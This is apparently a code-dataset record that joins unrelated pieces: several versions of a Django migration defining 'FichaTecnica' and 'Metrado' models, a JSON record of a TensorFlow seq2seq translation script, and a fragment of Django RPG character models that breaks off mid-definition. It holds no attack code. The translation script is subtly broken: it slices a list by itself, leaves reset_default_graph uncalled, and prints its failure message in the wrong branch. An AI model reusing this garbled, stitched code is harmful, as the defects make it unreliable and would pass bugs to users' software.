)), ('descripcion', models.TextField()), ('metrado1', models.
ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],
options={}, bases=(models.Model,)), migrations.CreateModel(name=
'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',
serialize=False, auto_created=True, primary_key=True)), ('codigo',
models.CharField(max_length=25)), ('descripcion', models.TextField(
)), ('metrado2', models.ForeignKey(related_name='metrado_3', to=
'metrados.Metrado2'))], options={}, bases=(models.Model,)),
migrations.CreateModel(name='Metrado4', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField()), ('metrado3', models.ForeignKey(
related_name='metrado_4', to='metrados.Metrado3'))], options={},
bases=(models.Model,)), migrations.AddField(model_name=
'fichatecnica', name='metrado1', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado2', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado3', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado4', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [('levantamiento', '0001_initial')]
operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('numero', models.IntegerField(default=0)
), ('largo', models.FloatField(default=0)), ('ancho', models.
FloatField(default=0)), ('alto', models.FloatField(default=0)), (
'parcial', models.IntegerField(default=0)), ('unidad', models.
IntegerField(default=0)), ('punitario', models.IntegerField(default
=0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=
'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)
), migrations.CreateModel(name='Metrado1', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField())], options={}, bases=(models.
Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('codigo', models.CharField(max_length=25
)), ('descripcion', models.TextField()), ('metrado1', models.
ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],
options={}, bases=(models.Model,)), migrations.CreateModel(name=
'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',
serialize=False, auto_created=True, primary_key=True)), ('codigo',
models.CharField(max_length=25)), ('descripcion', models.TextField(
)), ('metrado2', models.ForeignKey(related_name='metrado_3', to=
'metrados.Metrado2'))], options={}, bases=(models.Model,)),
migrations.CreateModel(name='Metrado4', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField()), ('metrado3', models.ForeignKey(
related_name='metrado_4', to='metrados.Metrado3'))], options={},
bases=(models.Model,)), migrations.AddField(model_name=
'fichatecnica', name='metrado1', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado2', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado3', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado4', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('levantamiento', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FichaTecnica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('numero', models.IntegerField(default=0)),
('largo', models.FloatField(default=0)),
('ancho', models.FloatField(default=0)),
('alto', models.FloatField(default=0)),
('parcial', models.IntegerField(default=0)),
('unidad', models.IntegerField(default=0)),
('punitario', models.IntegerField(default=0)),
('form', models.ForeignKey(related_name='ficha_tecnica', to='levantamiento.Levantamiento')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado1',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado2',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado1', models.ForeignKey(related_name='metrado_2', to='metrados.Metrado1')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado3',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado2', models.ForeignKey(related_name='metrado_3', to='metrados.Metrado2')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado4',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado3', models.ForeignKey(related_name='metrado_4', to='metrados.Metrado3')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='fichatecnica',
name='metrado1',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado2',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado3',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado4',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True,
),
]
|
flexible
|
{
"blob_id": "1049a7d2cdc54c489af6246ec014deb63a98f96d",
"index": 3951,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('levantamiento', '0001_initial')]\n operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('numero', models.IntegerField(default=0)\n ), ('largo', models.FloatField(default=0)), ('ancho', models.\n FloatField(default=0)), ('alto', models.FloatField(default=0)), (\n 'parcial', models.IntegerField(default=0)), ('unidad', models.\n IntegerField(default=0)), ('punitario', models.IntegerField(default\n =0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=\n 'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)\n ), migrations.CreateModel(name='Metrado1', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField())], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('codigo', models.CharField(max_length=25\n )), ('descripcion', models.TextField()), ('metrado1', models.\n ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('codigo',\n models.CharField(max_length=25)), ('descripcion', models.TextField(\n )), ('metrado2', models.ForeignKey(related_name='metrado_3', to=\n 'metrados.Metrado2'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='Metrado4', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField()), ('metrado3', 
models.ForeignKey(\n related_name='metrado_4', to='metrados.Metrado3'))], options={},\n bases=(models.Model,)), migrations.AddField(model_name=\n 'fichatecnica', name='metrado1', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado2', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado3', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado4', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('levantamiento', '0001_initial')]\n operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('numero', models.IntegerField(default=0)\n ), ('largo', models.FloatField(default=0)), ('ancho', models.\n FloatField(default=0)), ('alto', models.FloatField(default=0)), (\n 'parcial', models.IntegerField(default=0)), ('unidad', models.\n IntegerField(default=0)), ('punitario', models.IntegerField(default\n =0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=\n 'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)\n ), migrations.CreateModel(name='Metrado1', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField())], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('codigo', models.CharField(max_length=25\n )), ('descripcion', models.TextField()), ('metrado1', models.\n ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('codigo',\n models.CharField(max_length=25)), ('descripcion', models.TextField(\n )), ('metrado2', models.ForeignKey(related_name='metrado_3', to=\n 'metrados.Metrado2'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='Metrado4', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', 
models.CharField(max_length=25)), (\n 'descripcion', models.TextField()), ('metrado3', models.ForeignKey(\n related_name='metrado_4', to='metrados.Metrado3'))], options={},\n bases=(models.Model,)), migrations.AddField(model_name=\n 'fichatecnica', name='metrado1', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado2', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado3', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado4', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True)]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('levantamiento', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FichaTecnica',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero', models.IntegerField(default=0)),\n ('largo', models.FloatField(default=0)),\n ('ancho', models.FloatField(default=0)),\n ('alto', models.FloatField(default=0)),\n ('parcial', models.IntegerField(default=0)),\n ('unidad', models.IntegerField(default=0)),\n ('punitario', models.IntegerField(default=0)),\n ('form', models.ForeignKey(related_name='ficha_tecnica', to='levantamiento.Levantamiento')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado1',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado2',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado1', models.ForeignKey(related_name='metrado_2', to='metrados.Metrado1')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado3',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado2', models.ForeignKey(related_name='metrado_3', to='metrados.Metrado2')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado4',\n fields=[\n ('id', 
models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado3', models.ForeignKey(related_name='metrado_4', to='metrados.Metrado3')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado1',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado2',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado3',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado4',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding:utf-8 -*-
import os
import numpy as np
import tensorflow as tf
from translate import datautil
import seq2seq_model
_buckets = []
convo_hist_limit = 1
max_source_length = 1
max_target_length = 2
flags = tf.app.flags
FLAGS = flags.FLAGS
tf.reset_default_graph
max_train_data_size = 0
data_dir = 'datacn/'
dropout = 1.0
grad_clip = 5.0
batch_size = 60
hidden_size = 14
num_layers = 2
learning_rate = 0.5
lr_decay_factor = 0.99
checkpoint_dir = 'data/checkpoints/'
hidden_size = 100
checkpoint_dir = 'fanyichina/checkpoints/'
data_dir = 'fanyichina'
_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]
def getfanyiInfo():
vocaben, rev_vocaben = datautil.initialize_vocabulary(
os.path.join(datautil.data_dir, datautil.vocabulary_fileen))
vocab_sizeen = len(vocaben)
vocabch, rev_vocabch = datautil.initialize_vocabulary(
os.path.join(datautil.data_dir, datautil.vocabulary_filech))
vocab_sizech = len(vocabch)
return vocab_sizeen, vocab_sizech, vocaben, vocabch
def createModel(session, forward_only, from_vocab_size, to_vocab_size):
model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size, _buckets, hidden_size, num_layers, dropout,
grad_clip, batch_size, learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf.float32)
ckpt = tf.train.latest_checkpoint(checkpoint_dir)
if ckpt != None:
model.saver.restore(session, ckpt)
else:
session.run(tf.global_variables_initializer())
return model
def main():
vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()
if not os.path.exists(checkpoint_dir):
os.mkdir(checkpoint_dir)
with tf.Session() as sess:
model = createModel(sess, True, vocab_sizeen, vocab_sizech)
model.batch_size = 1
conversation_history = []
while True:
prompt = '请输入:'
sentence = input(prompt)
conversation_history.append(sentence)
conversation_history = conversation_history[-conversation_history:]
token_ids = list(reversed(datautil.sentence_to_ids(
" ".join(conversation_history), vocaben, normalize_digits=True, Isch=True)))
bucket_id = min([b for b in range(len(_buckets))
if _buckets[b][0] > len(token_ids)])
encoder_inputs, decoder_inputs, target_weights = model.get_batch(
{bucket_id: [(token_ids, [])]}, bucket_id)
_, _, output_logits = model.step(
sess, encoder_inputs, decoder_inputs, target_weights, bucket_id, True)
outputs = [int(np.argmax(logit, axis=1))
for logit in output_logits]
if datautil.EOS_ID in outputs:
outputs = outputs[:outputs.index(datautil.EOS_ID)]
convo_output = " ".join(
datautil.ids2texts(outputs, rev_vocabch))
conversation_history.append(convo_output)
else:
print('can not translation!')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "b7007778ea9dfac3af8c31d66d32d8157dc0d69b",
"index": 1517,
"step-1": "<mask token>\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\n<mask token>\n",
"step-2": "<mask token>\ntf.reset_default_graph\n<mask token>\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' '.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n 
convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\nflags = tf.app.flags\nFLAGS = flags.FLAGS\ntf.reset_default_graph\nmax_train_data_size = 0\ndata_dir = 'datacn/'\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\ncheckpoint_dir = 'data/checkpoints/'\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' '.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = 
min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport numpy as np\nimport tensorflow as tf\nfrom translate import datautil\nimport seq2seq_model\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\nflags = tf.app.flags\nFLAGS = flags.FLAGS\ntf.reset_default_graph\nmax_train_data_size = 0\ndata_dir = 'datacn/'\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\ncheckpoint_dir = 'data/checkpoints/'\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' 
'.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# -*- coding:utf-8 -*-\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom translate import datautil\nimport seq2seq_model\n\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\ntf.reset_default_graph\n\nmax_train_data_size = 0\n\ndata_dir = 'datacn/'\n\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\n\ncheckpoint_dir = 'data/checkpoints/'\n\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(\n os.path.join(datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(\n os.path.join(datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size, _buckets, hidden_size, num_layers, dropout,\n grad_clip, batch_size, learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf.float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n\n token_ids = 
list(reversed(datautil.sentence_to_ids(\n \" \".join(conversation_history), vocaben, normalize_digits=True, Isch=True)))\n bucket_id = min([b for b in range(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(\n sess, encoder_inputs, decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1))\n for logit in output_logits]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = \" \".join(\n datautil.ids2texts(outputs, rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class Classe(PolymorphicModel):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
<|reserved_special_token_0|>
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pericia(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
